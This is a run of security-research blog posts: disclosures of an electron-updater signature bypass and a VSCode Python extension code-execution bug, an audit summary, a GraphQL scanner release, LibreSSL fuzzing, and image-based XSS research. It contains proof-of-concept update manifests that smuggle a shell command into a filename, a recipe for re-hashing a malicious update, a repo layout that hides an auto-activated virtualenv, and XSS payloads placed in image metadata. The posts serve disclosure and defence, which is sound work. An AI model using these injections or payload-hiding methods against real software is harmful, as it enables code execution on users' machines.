
Signature Validation Bypass Leading to RCE In Electron-Updater

23 February 2020 at 23:00

We’ve been made aware that the vulnerability discussed in this blog post has been independently discovered and disclosed to the public by a well-known security researcher. Since the security issue is now public and it is over 90 days from our initial disclosure to the maintainer, we have decided to publish the details - even though the fix available in the latest version of Electron-Builder does not fully mitigate the security flaw.

Electron-Builder advertises itself as a “complete solution to package and build a ready for distribution Electron app with auto update support out of the box”. For macOS and Windows, code signing and verification are also supported. At the time of writing, the package counts around 100k weekly downloads, and it is being used by ~36k projects with over 8k stargazers.

Electron-Builder repository

This software is commonly used to build platform-specific packages for ElectronJS-based applications and is frequently employed for software updates as well. The auto-update feature is provided by its electron-updater submodule, internally using Squirrel.Mac for macOS, NSIS for Windows, and AppImage for Linux. In particular, it features a dual code-signing method for Windows (supporting both SHA1 and SHA256 hashing algorithms).

A Fail Open Design

As part of a security engagement for one of our customers, we reviewed the update mechanism implemented by Electron-Builder and discovered an overall lack of secure coding practices. In particular, we identified a vulnerability that can be leveraged to bypass the signature verification check, thus leading to remote command execution.

The signature verification check performed by electron-builder is simply based on a string comparison between the installed binary’s publisherName and the certificate’s Common Name attribute of the update binary. During a software update, the application will request a file named latest.yml from the update server, which contains the definition of the new release - including the binary filename and hashes.

To retrieve the update binary’s publisher, the module executes the following code leveraging the native Get-AuthenticodeSignature cmdlet from Microsoft.PowerShell.Security:

    execFile("powershell.exe", ["-NoProfile", "-NonInteractive", "-InputFormat", "None", "-Command", `Get-AuthenticodeSignature '${tempUpdateFile}' | ConvertTo-Json -Compress`], {
      timeout: 20 * 1000
    }, (error, stdout, stderr) => {
      try {
        if (error != null || stderr) {
          handleError(logger, error, stderr)
          resolve(null)
          return
        }

        const data = parseOut(stdout)
        if (data.Status === 0) {
          const name = parseDn(data.SignerCertificate.Subject).get("CN")!
          if (publisherNames.includes(name)) {
            resolve(null)
            return
          }
        }

        const result = `publisherNames: ${publisherNames.join(" | ")}, raw info: ` + JSON.stringify(data, (name, value) => name === "RawData" ? undefined : value, 2)
        logger.warn(`Sign verification failed, installer signed with incorrect certificate: ${result}`)
        resolve(result)
      }
      catch (e) {
        logger.warn(`Cannot execute Get-AuthenticodeSignature: ${error}. Ignoring signature validation due to unknown error.`)
        resolve(null)
        return
      }
    })

which translates to the following PowerShell command:

powershell.exe -NoProfile -NonInteractive -InputFormat None -Command "Get-AuthenticodeSignature 'C:\Users\<USER>\AppData\Roaming\<vulnerable app name>\__update__\<update name>.exe' | ConvertTo-Json -Compress"

Since the ${tempUpdateFile} variable is provided unescaped to the execFile utility, an attacker can bypass the entire signature verification by triggering a parse error in the script. This can easily be achieved by using a filename containing a single quote and then recalculating the file hash to match the attacker-provided binary (using shasum -a 512 maliciousupdate.exe | cut -d " " -f1 | xxd -r -p | base64).
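
The base64-encoded SHA-512 digest expected in latest.yml can also be recomputed with a few lines of Python (a minimal sketch equivalent to the shasum pipeline above; the filename is just an example):

import base64, hashlib

# Compute the base64-encoded SHA-512 digest that electron-updater
# expects to find in latest.yml for the served binary.
with open("maliciousupdate.exe", "rb") as f:
    digest = hashlib.sha512(f.read()).digest()
print(base64.b64encode(digest).decode())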

For instance, a malicious update definition would look like:

version: 1.2.3
files:
  - url: v'ulnerable-app-setup-1.2.3.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
    size: 44653912
path: v'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

When serving a similar latest.yml to a vulnerable Electron app, the attacker-chosen setup executable will be run without warnings. Alternatively, the attacker may leverage the lack of escaping to pull off a trivial command injection:

version: 1.2.3
files:
  - url: v';calc;'ulnerable-app-setup-1.2.3.exe
    sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZ[...]tkYPEvMxDWgNkb8tPCNZLTbKWcDEOJzfA==
    size: 44653912
path: v';calc;'ulnerable-app-1.2.3.exe
sha512: GIh9UnKyCaPQ7ccX0MDL10UxPAAZr1[...]ZrR5X1kb8tPCNZLTbKWcDEOJzfA==
releaseDate: '2019-11-20T11:17:02.627Z'

From an attacker’s standpoint, it would be more practical to backdoor the installer and then leverage preexisting electron-updater features like isAdminRightsRequired to run the installer with Administrator privileges.

PoC Reproduction of the command injection by using Burp's interception feature

Impact

An attacker could leverage this fail open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a service compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server.

Disclosure Timelines

Doyensec contacted the main project maintainer on November 12th, 2019, providing a full description of the vulnerability together with a Proof-of-Concept. After multiple follow-ups, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk.

At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows, including:

On February 15th, 2020, we became aware that the vulnerability covered in this blog post was being discussed on Twitter. On February 24th, 2020, we were informed by the package’s maintainer that the issue was resolved in release v22.3.5. While the patch mitigates the potential command injection risk, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates.

Mitigations

Despite its popularity, we suggest moving away from Electron-Builder due to the lack of secure coding practices and the maintainer’s limited responsiveness.

Electron Forge represents a potential well-maintained substitute, which takes advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since Squirrel.Windows doesn’t implement signature validation either, for robust signature validation on Windows consider shipping the app to the Windows Store or incorporating minisign into the update workflow.

Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected.

If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exist in Electron-Builder.

Standard security hardening and monitoring on the update server are important, as full access to that system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario.

Credits

This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post.

2019 Gravitational Security Audit Results

1 March 2020 at 23:00

This is a re-post of the original blogpost published by Gravitational on the 2019 security audit results for their two products: Teleport and Gravity.

You can download the security testing deliverables for Teleport and Gravity from our research page.

We would like to take this opportunity to thank the Gravitational engineering team for choosing Doyensec and working with us to ensure a successful project execution.

We now live in an era where the security of all layers of the software stack is immensely important, and simply open sourcing a code base is not enough to ensure that security vulnerabilities surface and are addressed. At Gravitational, we see it as a necessity to engage a third party that specializes in acting as an adversary and can provide an independent analysis of our sources.

2019 Gravitational Security Audit Results

This year, we had an opportunity to work with Doyensec, which provided the most thorough independent analysis of Gravity and Teleport to date. The Doyensec team did an amazing job at finding areas where we are weak in the Gravity code base. Here is the full report for Teleport and Gravity; and you can find all of our security audits here.

Gravity

Gravity has a lot of moving components. As a Kubernetes distribution and distributed system for delivering Kubernetes in many unique environments, the product’s attack surface isn’t small.

All flaws considered medium or higher except for one were patched and released as they were reported by the Doyensec team, and we’ve also been working towards addressing the more minor and informational issues as part of our normal release process. Out of the four vulnerabilities rated as high by Doyensec, we’ve managed to patch three of them, and the fourth relies on a significant investment in design and tooling change which we’ll go into in a moment.

Insecure Decompression of Application Bundles

Part of what Gravity does is package applications into an installer that can be taken to on-prem and air-gapped environments, installing a fully working Kubernetes cluster and application without dependencies. As such, we build our artifacts as a tar file - a virtually universally supported archive format.

Along with this, our own tooling is able to process and accept these tar archives, which is where we run into problems. Golang’s tar handling code is extremely basic and this allows very old tar handling problems to surface, granting specially crafted tar files the ability to overwrite arbitrary system files and allowing for remote code execution. Our tar handling has now been hardened against such vulnerabilities, and we’ll write a post digging into just this topic soon.
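
The underlying class of bug is the classic tar path traversal. A minimal illustration of the kind of check required (sketched in Python purely for clarity; it is not Gravity's actual Go implementation) looks like this:

import os
import tarfile

def safe_extract(archive_path: str, dest: str) -> None:
    """Extract a tar archive, rejecting entries that would escape the destination."""
    dest = os.path.realpath(dest)
    with tarfile.open(archive_path) as tar:
        for member in tar.getmembers():
            target = os.path.realpath(os.path.join(dest, member.name))
            # Reject absolute paths and ../ traversal that would land outside dest
            if not target.startswith(dest + os.sep):
                raise ValueError(f"blocked suspicious tar entry: {member.name}")
        tar.extractall(dest)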

Remote Code Execution via Malicious Auth Connector

When using our CLI tools to do single sign-on, we launch a browser for the user to reach the single sign-on page. This was done by passing a URL from the server to the client to tell it where the SSO page is located.

Someone with access to the server is able to change the URL to a non-http(s) URL and execute programs locally on the CLI host. We’ve implemented sanitization of the URL passed by the server to enforce http(s), and also changed the design of some new features to not require trusting data from a server.
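
Conceptually, the fix boils down to allowlisting the URL scheme before handing the URL to the operating system. A rough Python sketch of the idea (illustrative only, not Gravitational's actual code):

from urllib.parse import urlparse

def validate_sso_url(url: str) -> str:
    """Only allow http(s) URLs to be opened in the user's browser."""
    scheme = urlparse(url).scheme.lower()
    if scheme not in ("http", "https"):
        raise ValueError(f"refusing to open non-http(s) URL: {url}")
    return url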

Missing ACLs in the API

Perhaps the most embarrassing issue in this list - the API endpoints responsible for managing API tokens were missing authorization ACLs. This allowed for any authenticated user, even those with empty permissions, to access, edit, and create tokens for other users. This would allow for user impersonation and privilege escalation. This vulnerability was quickly addressed by implementing the correct ACLs, and the team is working hard to ensure these types of vulnerabilities do not reoccur.

Missing Signature Verification in Application Bundles

This is the vulnerability we haven’t been able to address so far, as it was never a design objective to protect against this particular vulnerability.

Gravity includes a hub product for enterprise customers that allows for the storage and download of application assets, either for installation or upgrade. In essence, part of the hub product is to act as a file server where a company can store their application, and internally or publicly connect deployed clusters for updates.

The weakness in the model, as has been seen by many public artifact repositories, is that this security model relies on the integrity of the system storing those assets.

While not necessarily a vulnerability on its own, this is a design weakness that doesn’t match the capabilities the security community expects. The security is roughly equivalent to posting a binary build to GitHub - anyone with the correct access can modify or post malicious assets, and anyone who trusts GitHub when downloading that asset could be getting a malicious one. Instead, packages should be signed in some way before being posted to a public download server, and the software should have a method for trusting that updates and installs come from a trusted source.

This is a really difficult problem that many companies have gotten wrong, so it’s not something that Gravitational as an organization is willing to rush a solution for. There are several well known models that we are evaluating, but we’re not at a stage where we have a solution that we’re completely happy with.

In this realm, we’re also going to end-of-life the hub product, as the asset storage functionality is not widely used. We’re also going to move the remote access functionality that our customers do care about over to our Teleport product.

Teleport

As we mentioned in the Teleport 4.2 release notes, the most serious issues were centered around the incorrect handling of session data. If an attacker was able to gain valid x509 credentials of a Teleport node, they could use the session recording facility to read/write arbitrary files on the Auth Server or potentially corrupt recorded session data.

These vulnerabilities could only be exploited using credentials from a previously authenticated client. There was no known way to exploit this vulnerability from outside the cluster by non-authenticated clients.

After the re-assessment, all issues with any direct security impact were addressed. From the report:

In January 2020, Doyensec performed a retesting of the Teleport platform and confirmed the effectiveness of the applied mitigations. All issues with direct security impact have been addressed by Gravitational.

Even though all direct issues were mitigated, there was one issue in the report that continued to bother us and that we felt we could do better on: “#6: Session Recording Bypasses”. This is something we had known about for quite some time and something we have been upfront about with users and customers. Session recording is a great feature; however, due to the inherent complexity of the problem being solved, bypasses do exist.

Teleport 4.2 introduced a new feature called Enhanced Session Recording that uses eBPF tooling to substantially reduce the bypass gaps that can exist. We’ll have more to share on that soon in the form of another blog post that will go into the technical implementation details for that feature.

Don't Clone That Repo: Visual Studio Code^2 Execution

15 March 2020 at 23:00

This is the story of how I stumbled upon a code execution vulnerability in the Visual Studio Code Python extension. It currently has 16.5M+ installs reported in the extension marketplace.


The bug

Some time ago I was reviewing a client’s Python web application when I noticed a warning:

VSCode pylint not installed warning

Fair enough, I thought, I just need to install pylint.

To my surprise, after running pip install --user pylint the warning was still there. Then I noticed venv-test displayed on the lower-left of the editor window. Did VSCode just automatically select the Python environment from the project folder?! To confirm my hypothesis, I installed pylint inside that virtualenv and the warning disappeared.

VSCode pylint not installed warning full window screenshot

This seemed sketchy, so I added os.exec("/Applications/Calculator.app") to one of pylint’s sources and a calculator spawned. Easiest code execution ever!

This VSCode behavior is dangerous since the virtualenv found in a project folder is activated without user interaction. Adding a malicious folder to the workspace and opening a Python file inside the project is sufficient to trigger the vulnerability. Once a virtualenv is found, VSCode saves its path in .vscode/settings.json. If this file is found in the cloned repo, its value is loaded and trusted without asking the user. In practice, it is possible to hide the virtualenv in any repository.
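
As an illustration, a repository prepared for this attack only needs to ship a .vscode/settings.json pointing the interpreter setting used by the Python extension at a virtualenv bundled in the repo. A small, hypothetical script reproducing that layout (the folder name matches the PoC repo described below):

import json, os

# Hypothetical reproduction of the PoC repo layout: a settings.json that
# points the Python extension at a virtualenv shipped inside the repository.
os.makedirs(".vscode", exist_ok=True)
settings = {
    "python.pythonPath": "totally_innocuous_folder/no_seriously_nothing_to_see_here/bin/python"
}
with open(".vscode/settings.json", "w") as f:
    json.dump(settings, f, indent=2)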

The behavior is not in the VSCode core, but rather in the Python extension. We contacted Microsoft on October 2nd, 2019; however, the vulnerability is still not patched at the time of writing. Given that the industry-standard 90 days have expired and the issue is exposed in a GitHub issue, we have decided to disclose the vulnerability.

PoC || GTFO

You can try for yourself! This innocuous PoC repo opens Calculator.app on macOS:

  • git clone git@github.com:doyensec/VSCode_PoC_Oct2019.git
  • add the cloned repo to the VSCode workspace
  • open test.py in VSCode

This repo contains a “malicious” settings.json which selects the virtualenv in totally_innocuous_folder/no_seriously_nothing_to_see_here.

In the case of a bare-bones repo like this, noticing the virtualenv might be easy, but it is clear how one might miss it in a real-life codebase. Moreover, it is certainly undesirable that VSCode executes code from a folder just by opening a Python file in the editor.

Disclosure Timeline

  • 2nd Oct 2019: Issue discovered
  • 2nd Oct 2019: Security advisory sent to Microsoft
  • 8th Oct 2019: Response from Microsoft, issue opened on vscode-python bug tracker #7805
  • 7th Jan 2020: Asked Microsoft for a resolution timeframe
  • 8th Jan 2020: Microsoft replies that the issue should be fixed by mid-April 2020
  • 16th Mar 2020: Doyensec advisory and blog post is published

Edits

  • 17th Mar 2020: The blogpost stated that the extension is bundled by default with the editor. That is not the case, and we removed that claim. Thanks @justinsteven for pointing this out!

InQL Scanner

25 March 2020 at 23:00

InQL is now public!

As a part of our continuing security research journey, we started developing an internal tool to speed-up GraphQL security testing efforts. We’re excited to announce that InQL is available on Github.

Doyensec Loves GraphQL

InQL can be used as a stand-alone script, or as a Burp Suite extension (available for both Professional and Community editions). The tool leverages the GraphQL built-in introspection query to dump queries, mutations, subscriptions, fields, and arguments, and to retrieve default and custom objects. This information is collected and then processed to construct API endpoint documentation in the form of HTML and JSON schemas. InQL is also able to generate query templates for all the known types. The scanner can identify basic query types and replace them with placeholders that render the query ready to be ingested by a remote API endpoint.

We believe this feature, combined with the ability to send query templates to Burp’s Repeater, will decrease the time to exploit vulnerabilities in GraphQL endpoints and drastically lower the bar for security research against GraphQL tech stacks.
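
To give an idea of the request the tool builds on, the following is a bare-bones introspection query sent with Python (a minimal sketch; the endpoint URL is a placeholder, and the introspection query actually used by InQL is far more complete):

import requests

# Minimal GraphQL introspection request: list the names of all types
# exposed by the endpoint.
introspection = "{ __schema { types { name } } }"
resp = requests.post("https://example.com/graphql", json={"query": introspection})
for gql_type in resp.json()["data"]["__schema"]["types"]:
    print(gql_type["name"])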

InQL Scanner Burp Suite Extension

Using the inql extension for Burp Suite, you can:

  • Search for known GraphQL URL paths; the tool will grep and match known values to detect GraphQL endpoints within the target website
  • Search for exposed GraphQL development consoles (GraphiQL, GraphQL Playground, and other common utilities)
  • Use a custom GraphQL tab displayed on each HTTP request/response containing GraphQL
  • Leverage the template generation by sending those requests to Burp’s Repeater tool
  • Configure the tool by using a custom settings tab

Enabling InQL Scanner Extension in Burp

To use inql in Burp Suite, import the Python extension:

  • Download the latest Jython Jar
  • Download the latest version of InQL scanner
  • Start Burp Suite
  • Extender Tab > Options > Python Environment > Set the location of Jython standalone JAR
  • Extender Tab > Extension > Add > Extension Type > Select Python
  • Extension File > Set the location of inql_burp.py > Next
  • The output window should display the following message: InQL Scanner Started!

In the near future, we might consider integrating the extension within Burp’s BApp Store.

InQL Demo

We completely revamped the command line interface in light of InQL’s public release. This interface retains most of the Burp plugin functionalities.

It is now possible to install the tool with pip and run it through your favorite CLI.

pip install inql

For all supported options, check the command line help:

usage: inql [-h] [-t TARGET] [-f SCHEMA_JSON_FILE] [-k KEY] [-p PROXY]
            [--header HEADERS HEADERS] [-d] [--generate-html]
            [--generate-schema] [--generate-queries] [--insecure]
            [-o OUTPUT_DIRECTORY]

InQL Scanner

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET             Remote GraphQL Endpoint (https://<Target_IP>/graphql)
  -f SCHEMA_JSON_FILE   Schema file in JSON format
  -k KEY                API Authentication Key
  -p PROXY              IP of web proxy to go through (http://127.0.0.1:8080)
  --header HEADERS HEADERS
  -d                    Replace known GraphQL arguments types with placeholder
                        values (useful for Burp Suite)
  --generate-html       Generate HTML Documentation
  --generate-schema     Generate JSON Schema Documentation
  --generate-queries    Generate Queries
  --insecure            Accept any SSL/TLS certificate
  -o OUTPUT_DIRECTORY   Output Directory

An example query can be performed against one of the numerous exposed APIs, e.g. the anilist.co endpoint:

$ inql -t https://anilist.co/graphql
[+] Writing Queries Templates
 |  Page
 |  Media
 |  MediaTrend
 |  AiringSchedule
 |  Character
 |  Staff
 |  MediaList
 |  MediaListCollection
 |  GenreCollection
 |  MediaTagCollection
 |  User
 |  Viewer
 |  Notification
 |  Studio
 |  Review
 |  Activity
 |  ActivityReply
 |  Following
 |  Follower
 |  Thread
 |  ThreadComment
 |  Recommendation
 |  Like
 |  Markdown
 |  AniChartUser
 |  SiteStatistics
[+] Writing Queries Templates
 |  UpdateUser
 |  SaveMediaListEntry
 |  UpdateMediaListEntries
 |  DeleteMediaListEntry
 |  DeleteCustomList
 |  SaveTextActivity
 |  SaveMessageActivity
 |  SaveListActivity
 |  DeleteActivity
 |  ToggleActivitySubscription
 |  SaveActivityReply
 |  DeleteActivityReply
 |  ToggleLike
 |  ToggleLikeV2
 |  ToggleFollow
 |  ToggleFavourite
 |  UpdateFavouriteOrder
 |  SaveReview
 |  DeleteReview
 |  RateReview
 |  SaveRecommendation
 |  SaveThread
 |  DeleteThread
 |  ToggleThreadSubscription
 |  SaveThreadComment
 |  DeleteThreadComment
 |  UpdateAniChartSettings
 |  UpdateAniChartHighlights
[+] Writing Queries Templates
[+] Writing Queries Templates

The resulting HTML documentation page will contain details for all available queries, mutations, and subscriptions.

Stay tuned!

Back in May 2018, we published a blog post on GraphQL security where we focused on vulnerabilities and misconfigurations. As part of that research effort, we developed a simple script to query GraphQL endpoints. After the publication, we received a lot of positive feedback that sparked even more interest in further developing the concept. Since then, we have refined our GraphQL testing methodologies and tooling. As part of our standard customer engagements, we often perform testing against GraphQL technologies, hence we expect to continue our research efforts in this space. Going forward, we will keep improving detection and making the tool more stable.

This project was made with love in the Doyensec Research island.

LibreSSL and OSS-Fuzz

7 April 2020 at 22:00

The story of a fuzzing integration reward

In my first month at Doyensec I had the opportunity to bring together both my work and my spare-time hobbies. I used the 25% research time offered by Doyensec to integrate the LibreSSL library into OSS-Fuzz. LibreSSL is an API-compatible replacement for OpenSSL and, after the Heartbleed attack, it has come to be considered a full-fledged replacement for OpenSSL on OpenBSD, macOS and Void Linux.

OSS-Fuzz Fuzzing Process

As part of this research, Google awarded us a $10,000 bounty, 100% of which was donated to the Cancer Research Institute. The fuzzer also discovered 14+ new vulnerabilities, four of which were directly related to memory corruption.

In the following paragraphs we will walk through the process of porting a new project over to OSS-Fuzz, from following the community-provided steps all the way to the actual code porting, and we will also show a vulnerability fixed in 136e6c997f476cc65e614e514ac3bf6ee54fc4b4.

commit 136e6c997f476cc65e614e514ac3bf6ee54fc4b4
Author: beck <>
Date:   Sat Mar 23 18:48:15 2019 +0000

    Add range checks to varios ASN1_INTEGER functions to ensure the
    sizes used remain a positive integer. Should address issue
    13799 from oss-fuzz
    ok tb@ jsing@

 src/lib/libcrypto/asn1/a_int.c    | 56 +++++++++++++++++++++++++++++++++++++++++++++++++++++---
 src/lib/libcrypto/asn1/tasn_prn.c |  8 ++++++--
 src/lib/libcrypto/bn/bn_lib.c     |  4 +++-
 3 files changed, 62 insertions(+), 6 deletions(-)

The FOSS historician blurry book

As a Void Linux maintainer, I’m a long-time LibreSSL user and proponent. LibreSSL is a version of the TLS/crypto stack forked from OpenSSL in 2014, with the goals of modernizing the codebase, improving security, and applying best-practice development procedures. The motivation for this kind of fork arose after the discovery of the Heartbleed vulnerability.

LibreSSL’s efforts are aimed at removing code considered useless for the target platforms, removing code smells and including additional secure defaults at the cost of compatibility. The LibreSSL codebase is now nearly 70% the size of OpenSSL (237558 cloc vs 335485 cloc), while implementing a similar API on all the major modern operating systems.

Forking is considered a Bad Thing not merely because it implies a lot of wasted effort in the future, but because forks tend to be accompanied by a great deal of strife and acrimony between the successor groups over issues of legitimacy, succession, and design direction. There is serious social pressure against forking. As a result, major forks (such as the Gnu-Emacs/XEmacs split, the fissioning of the 386BSD group into three daughter projects, and the short-lived GCC/EGCS split) are rare enough that they are remembered individually in hacker folklore.

Eric Raymond Homesteading the Noosphere

The LibreSSL effort was generally well received and it now replaces OpenSSL on OpenBSD, on macOS since 10.11, and on many other Linux distributions. In the first few years, 6 critical vulnerabilities were found in OpenSSL and none of them affected LibreSSL.

Historically, these kinds of forks tend to spawn competing projects which cannot later exchange code, splitting the potential pool of developers between them. However, the LibreSSL team has largely demonstrated its ability to merge and implement new OpenSSL code and bug fixes, all while slimming down the original source code and cutting down on rarely used or dangerous features.

OSS-Fuzz Selection

While the development of LibreSSL appears to be a story with a happy ending, the integration of fuzzing and security auditing into the project was much less so. The Heartbleed vulnerability was a wake-up call for the industry to tackle the security of the libraries that make up the core of the Internet. In particular, Google opened up the OSS-Fuzz project. OSS-Fuzz is an effort to provide, for free, Google infrastructure to perform fuzzing against the most popular open source libraries. One of the first projects to undergo these tests was in fact OpenSSL.

OSS-Fuzz Fuzzing Process

Fuzz testing is a well-known technique for uncovering programming errors in software. Many of these detectable errors, like buffer overflows, can have serious security implications. OpenSSL included fuzzers in c38bb72797916f2a0ab9906aad29162ca8d53546 and was integrated into OSS-Fuzz later in 2016.

commit c38bb72797916f2a0ab9906aad29162ca8d53546
Refs: OpenSSL_1_1_0-pre5-217-gc38bb72797
Author:     Ben Laurie <[email protected]>
AuthorDate: Sat Mar 26 17:19:14 2016 +0000
Commit:     Ben Laurie <[email protected]>
CommitDate: Sat May 7 18:13:54 2016 +0100
    Add fuzzing!

Since both LibreSSL and OpenSSL share most of their codebase, with LibreSSL mainly implementing a secure subset of OpenSSL, we thought porting the OpenSSL fuzzers to LibreSSL would be a fun and useful project. Moreover, this resulted in the discovery of several memory corruption bugs.

Note that the following details won’t replace the official OSS-Fuzz guide, but they will help in selecting a good target project for OSS-Fuzz integration. Generally speaking, applying for a new OSS-Fuzz integration proceeds in four logical steps:

  • Selection: Select a new project that isn’t yet ported. Check for existing projects in OSS-Fuzz projects directory. For example, check if somebody already tried to perform the same integration in a pull-request.
  • Feasibility: Check the feasibility and the security implications of that project on the Internet. As a general guideline, the more impact the project has on the everyday usage of the web the bigger the bounty will be. At the time of writing, OSS-Fuzz bounties are up to $20,000 with the Google patch-reward program. On the other hand, good coverage is expected to be developed for any integration. For this reason it is easier to integrate projects that already employ fuzzers.
  • Technical integration: Follow the super detailed getting started guide to perform an initial integration.
  • Profit: Apply for the Google patch-reward program. Profit?!

We were awarded a bounty, and we helped to protect the Internet just a little bit more. You should do it too!

Heartbreak

After a crash is found, the OSS-Fuzz infrastructure provides a minimized test case which can be inspected by an analyst. The issue was found in the ASN1 parser. ASN1 is a formal notation used for describing data transmitted by telecommunications protocols, regardless of language implementation and physical representation of the data, whether complex or very simple. Coincidentally, it is employed for x.509 certificates, which represent the technical basis for building public-key infrastructure.

Passing our testcase 0202 ff25 through dumpasn1, it’s possible to see it error out, reporting that the integer of length 2 (bytes) is encoded with a negative value. This is not allowed in ASN1, and it should not even be allowed in LibreSSL. However, as discovered by OSS-Fuzz, this test crashes the LibreSSL parser.

$ xxd ./test
00000000: 0202 ff25                                ...%
$ dumpasn1 ./test
  0   2: INTEGER 65317
       :   Error: Integer is encoded as a negative value.

0 warnings, 1 error.
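
The two value bytes ff25 make the mismatch easy to see: read as an unsigned integer they give 65317 (what dumpasn1 prints), but under a two’s-complement reading the leading 0xff makes the value negative. A quick check in Python:

value = bytes.fromhex("ff25")
print(int.from_bytes(value, "big"))               # 65317, the unsigned reading
print(int.from_bytes(value, "big", signed=True))  # -219, the two's-complement reading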

Since the LibreSSL implementation was not guarded against negative integers, trying to convert the crafted negative ASN1 integer to the internal BIGNUM representation caused an uncontrolled over-read.

AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1==ERROR: AddressSanitizer: SEGV on unknown address 0x00009fff8000 (pc 0x00000058a308 bp 0x7ffd3e8b7bb0 sp 0x7ffd3e8b7b40 T0)
    ==1==The signal is caused by a READ memory access.
    SCARINESS: 20 (wild-addr-read)
        #0 0x58a307 in BN_bin2bn libressl/crypto/bn/bn_lib.c:601:19
        #1 0x6cd5ac in ASN1_INTEGER_to_BN libressl/crypto/asn1/a_int.c:456:13
        #2 0x6a39dd in i2s_ASN1_INTEGER libressl/crypto/x509v3/v3_utl.c:175:16
        #3 0x571827 in asn1_print_integer_ctx libressl/crypto/asn1/tasn_prn.c:457:6
        #4 0x571827 in asn1_primitive_print libressl/crypto/asn1/tasn_prn.c:556
        #5 0x571827 in asn1_item_print_ctx libressl/crypto/asn1/tasn_prn.c:239
        #6 0x57069a in ASN1_item_print libressl/crypto/asn1/tasn_prn.c:195:9
        #7 0x4f4db0 in FuzzerTestOneInput libressl.fuzzers/asn1.c:282:13
        #8 0x7fd3f5 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /src/libfuzzer/FuzzerLoop.cpp:529:15
        #9 0x7bd746 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /src/libfuzzer/FuzzerDriver.cpp:286:6
        #10 0x7c9273 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /src/libfuzzer/FuzzerDriver.cpp:715:9
        #11 0x7bcdbc in main /src/libfuzzer/FuzzerMain.cpp:19:10
        #12 0x7fa873b8282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/libc-start.c:291
        #13 0x41db18 in _start

This “wild” address read may be employed by malicious actors to perform leaks in security-sensitive contexts. The LibreSSL maintainers not only addressed the vulnerability promptly, but also included an additional protection to guard against missing ASN1_PRIMITIVE_FUNCS in 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9.

commit 46e7ab1b335b012d6a1ce84e4d3a9eaa3a3355d9
Author: jsing <>
Date:   Mon Apr 1 15:48:04 2019 +0000

    Require all ASN1_PRIMITIVE_FUNCS functions to be provided.

    If an ASN.1 item provides its own ASN1_PRIMITIVE_FUNCS functions, require
    all functions to be provided (currently excluding prim_clear). This avoids
    situations such as having a custom allocator that returns a specific struct
    but then is then printed using the default primative print functions, which
    interpret the memory as a different struct.

Closing the door to strangers

Fuzzing, despite being seen as one of the easiest ways to discover security vulnerabilities, still works very well. Even if OSS-Fuzz is especially tailored to open source projects, it can also be adapted to closed source projects. In fact, at the cost of implementing the LLVMFuzzerOneInput interface, it integrates all the latest and greatest clang/llvm fuzzer technology. Just as the Dockerfile language has enormously improved the devops side, we strongly believe that the OSS-Fuzz fuzzing interface definition should be employed in every non-trivial closed source project too. If you need help, contact us for your security automation projects!

As always, this research was funded thanks to the 25% research time offered at Doyensec. Tune in again for new episodes!

Researching Polymorphic Images for XSS on Google Scholar

29 April 2020 at 22:00

A few months ago I came across a curious design pattern on Google Scholar. Multiple screens of the web application were fetched and rendered using a combination of location.hash parameters and XHR to retrieve the supposed templating snippets from a relative URI, rendering them on the page unescaped.

Google Scholar's design pattern

This is not dangerous per se, unless the platform lets users upload arbitrary content and serve it from the same origin, which unfortunately Google Scholar does, given its image upload functionality.

While any penetration tester worth her salt would deem the exploitation of the issue trivial, Scholar’s image processing backend was applying different transformations to the uploaded images (i.e. stripping metadata and reprocessing the picture). When reporting the vulnerability, Google’s VRP team did not consider the upload of a polymorphic image carrying a valid XSS payload possible, and instead requested a PoC||GTFO.

Given the age of this technique, I first went through all past “well-known” techniques to generate polymorphic pictures, and then developed a test suite to investigate the behavior of some of the most popular libraries for image processing (i.e. Imagemagick, GraphicsMagick, Libvips). This effort led to the discovery of some interesting caveats. Some of these methods can also be used to conceal web shells or Javascript content to bypass “self” CSP directives.

Payload in EXIF

The easiest approach is to embed our payload in the metadata of the image. In the case of JPEG/JFIF, these pieces of metadata are stored in application-specific markers (called APPX), but they are not taken into account by the majority of image libraries. Exiftool is a popular tool to edit those entries, but you may find that in some cases the characters get entity-escaped, so I resorted to inserting them manually. In the hope that Google Scholar preserved some whitelisted EXIF tags, I created an image having 1.2k common EXIF tags, including CIPA standard and non-standard tags.
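
For reference, writing a payload into a standard EXIF field with exiftool looks roughly like this (a sketch; the filename is a placeholder, and as noted above some characters may end up entity-escaped depending on how the tag is written):

import subprocess

# Write an XSS payload into the standard EXIF ImageDescription tag.
payload = '"><script>alert(document.domain)</script>'
subprocess.run(["exiftool", f"-ImageDescription={payload}", "image.jpg"], check=True)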

JPG having the plain XSS alert() payload in every common metadata field
PNG having the plain XSS alert() payload in every common metadata field

While that didn’t work in my case, some of the EXIF entries are to this day kept by many popular web platforms. In most of the image libraries tested, PNG metadata is always kept when converting from PNG to PNG, while it is always lost when converting from PNG to JPG.

